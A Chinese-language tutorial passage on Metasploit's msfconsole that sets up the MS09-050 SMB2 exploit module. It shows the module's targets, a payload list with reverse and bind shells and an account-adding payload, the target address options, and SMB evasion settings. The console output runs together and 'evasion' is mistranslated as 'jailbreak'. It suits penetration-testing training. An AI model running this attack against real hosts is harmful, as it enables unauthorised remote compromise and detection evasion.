在 Metasploit 中选择一个漏洞利用程序将'exploit'和'check'命令添加到 msfconsole。

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_indexmsf exploit(ms09_050_smb2_negotiate_func_index) > help...略...Exploit 命令

命   令       描    述-------       -----------check         检查目标是否易受攻击exploit       启动漏洞利用尝试pry           在当前模块上打开一个Pry会话rcheck        重新加载模块并检查目标是否存在漏洞reload        只需重新加载模块rerun         重新运行exploit（漏洞）的别名rexploit      重新加载模块并启动漏洞攻击尝试run           运行exploit（漏洞）的别名

msf exploit(ms09_050_smb2_negotiate_func_index) >show 使用 exploits（漏洞）还会为'show'命令添加更多选项。

MSF Exploit Targets（漏洞目标）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show targets

Exploit targets:

Id Name

0 Windows Vista SP1/SP2 and Server 2008 (x86)MSF Exploit Payloads（漏洞有效载荷）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads

Compatible Payloads

Name Disclosure Date Rank Description

generic/custom normal Custom Payloadgeneric/debug_trap normal Generic x86 Debug Trapgeneric/shell_bind_tcp normal Generic Command Shell, Bind TCP Inlinegeneric/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inlinegeneric/tight_loop normal Generic x86 Tight Loopwindows/adduser normal Windows Execute net user /ADD...略...

MSF Exploit Options（漏洞选项）:

msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

Name Current Setting Required Description

RHOST 192.168.1.136 yes The target addressRPORT 445 yes The target port (TCP)WAIT 180 yes The number of seconds to wait for the attack to complete.

Exploit target:

Id Name

0 Windows Vista SP1/SP2 and Server 2008 (x86)Advanced（高级）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show advanced

Module advanced options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

Name Current Setting Required Description

CHOST no The local client addressCPORT no The local client portConnectTimeout 10 yes Maximum number of seconds to establish a TCP connectionContextInformationFile no The information file that contains context informationDisablePayloadHandler false no Disable the handler code for the selected payloadEnableContextEncoding false no Use transient context when encoding payloads...略...Evasion（越狱）：

msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion

Module evasion options:

Name Current Setting Required Description

SMB::obscure_trans_pipe_level 0 yes Obscure PIPE string in TransNamedPipe (level 0-3)SMB::pad_data_level 0 yes Place extra padding between headers and data (level 0-3)SMB::pad_file_level 0 yes Obscure path names used in open/create (level 0-3)SMB::pipe_evasion false yes Enable segmented read/writes for SMB PipesSMB::pipe_read_max_size 1024 yes Maximum buffer size for pipe readsSMB::pipe_read_min_size 1 yes Minimum buffer size for pipe readsSMB::pipe_write_max_size 1024 yes Maximum buffer size for pipe writesSMB::pipe_write_min_size 1 yes Minimum buffer size for pipe writesTCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)TCP::send_delay 0 no Delays inserted before every send. (0 = disable)